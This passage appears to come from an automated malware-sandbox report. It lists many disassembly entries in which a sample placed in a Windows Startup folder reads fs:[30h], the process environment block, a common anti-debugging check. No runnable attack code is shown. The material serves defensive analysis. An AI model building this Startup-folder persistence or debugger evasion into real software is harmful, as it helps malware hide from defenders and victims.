          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01143B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01143B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0111DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01142397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011D138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011CD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01121B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01121B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01144BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01144BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01144BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011E5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0113DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01115210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01115210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01115210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01115210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0111AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0111AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01133A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01128A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01154A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01154A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011DEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011A4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01119240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01119240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01119240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01119240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0115927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011CB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011E8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0112AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0112AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0114FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01142ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01142AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0111AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01123D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_011E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_0119A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exe Code function: 21_2_01144D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01144D3B mov eax, dword ptr fs:[00000030h]21_2_01144D3B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01144D3B mov eax, dword ptr fs:[00000030h]21_2_01144D3B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01137D50 mov eax, dword ptr fs:[00000030h]21_2_01137D50
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01153D43 mov eax, dword ptr fs:[00000030h]21_2_01153D43
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01193540 mov eax, dword ptr fs:[00000030h]21_2_01193540
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113C577 mov eax, dword ptr fs:[00000030h]21_2_0113C577
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113C577 mov eax, dword ptr fs:[00000030h]21_2_0113C577
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114FD9B mov eax, dword ptr fs:[00000030h]21_2_0114FD9B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114FD9B mov eax, dword ptr fs:[00000030h]21_2_0114FD9B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01142581 mov eax, dword ptr fs:[00000030h]21_2_01142581
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01142581 mov eax, dword ptr fs:[00000030h]21_2_01142581
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01142581 mov eax, dword ptr fs:[00000030h]21_2_01142581
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01142581 mov eax, dword ptr fs:[00000030h]21_2_01142581
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01112D8A mov eax, dword ptr fs:[00000030h]21_2_01112D8A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01112D8A mov eax, dword ptr fs:[00000030h]21_2_01112D8A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01112D8A mov eax, dword ptr fs:[00000030h]21_2_01112D8A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01112D8A mov eax, dword ptr fs:[00000030h]21_2_01112D8A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01112D8A mov eax, dword ptr fs:[00000030h]21_2_01112D8A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01141DB5 mov eax, dword ptr fs:[00000030h]21_2_01141DB5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01141DB5 mov eax, dword ptr fs:[00000030h]21_2_01141DB5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01141DB5 mov eax, dword ptr fs:[00000030h]21_2_01141DB5
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E05AC mov eax, dword ptr fs:[00000030h]21_2_011E05AC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E05AC mov eax, dword ptr fs:[00000030h]21_2_011E05AC
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011435A1 mov eax, dword ptr fs:[00000030h]21_2_011435A1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196DC9 mov eax, dword ptr fs:[00000030h]21_2_01196DC9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196DC9 mov eax, dword ptr fs:[00000030h]21_2_01196DC9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196DC9 mov eax, dword ptr fs:[00000030h]21_2_01196DC9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196DC9 mov ecx, dword ptr fs:[00000030h]21_2_01196DC9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196DC9 mov eax, dword ptr fs:[00000030h]21_2_01196DC9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196DC9 mov eax, dword ptr fs:[00000030h]21_2_01196DC9
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011C8DF1 mov eax, dword ptr fs:[00000030h]21_2_011C8DF1
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112D5E0 mov eax, dword ptr fs:[00000030h]21_2_0112D5E0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112D5E0 mov eax, dword ptr fs:[00000030h]21_2_0112D5E0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DFDE2 mov eax, dword ptr fs:[00000030h]21_2_011DFDE2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DFDE2 mov eax, dword ptr fs:[00000030h]21_2_011DFDE2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DFDE2 mov eax, dword ptr fs:[00000030h]21_2_011DFDE2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011DFDE2 mov eax, dword ptr fs:[00000030h]21_2_011DFDE2
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E740D mov eax, dword ptr fs:[00000030h]21_2_011E740D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E740D mov eax, dword ptr fs:[00000030h]21_2_011E740D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E740D mov eax, dword ptr fs:[00000030h]21_2_011E740D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196C0A mov eax, dword ptr fs:[00000030h]21_2_01196C0A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196C0A mov eax, dword ptr fs:[00000030h]21_2_01196C0A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196C0A mov eax, dword ptr fs:[00000030h]21_2_01196C0A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196C0A mov eax, dword ptr fs:[00000030h]21_2_01196C0A
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D1C06 mov eax, dword ptr fs:[00000030h]21_2_011D1C06
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114BC2C mov eax, dword ptr fs:[00000030h]21_2_0114BC2C
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AC450 mov eax, dword ptr fs:[00000030h]21_2_011AC450
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AC450 mov eax, dword ptr fs:[00000030h]21_2_011AC450
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114A44B mov eax, dword ptr fs:[00000030h]21_2_0114A44B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113746D mov eax, dword ptr fs:[00000030h]21_2_0113746D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0112849B mov eax, dword ptr fs:[00000030h]21_2_0112849B
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E8CD6 mov eax, dword ptr fs:[00000030h]21_2_011E8CD6
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011D14FB mov eax, dword ptr fs:[00000030h]21_2_011D14FB
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196CF0 mov eax, dword ptr fs:[00000030h]21_2_01196CF0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196CF0 mov eax, dword ptr fs:[00000030h]21_2_01196CF0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01196CF0 mov eax, dword ptr fs:[00000030h]21_2_01196CF0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0113F716 mov eax, dword ptr fs:[00000030h]21_2_0113F716
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AFF10 mov eax, dword ptr fs:[00000030h]21_2_011AFF10
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011AFF10 mov eax, dword ptr fs:[00000030h]21_2_011AFF10
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E070D mov eax, dword ptr fs:[00000030h]21_2_011E070D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_011E070D mov eax, dword ptr fs:[00000030h]21_2_011E070D
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114A70E mov eax, dword ptr fs:[00000030h]21_2_0114A70E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114A70E mov eax, dword ptr fs:[00000030h]21_2_0114A70E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_0114E730 mov eax, dword ptr fs:[00000030h]21_2_0114E730
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01114F2E mov eax, dword ptr fs:[00000030h]21_2_01114F2E
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f5cZJ0WC0H.exeCode function: 21_2_01114F2E mov eax, dword ptr fs:[00000030h]21_2_01114F2E
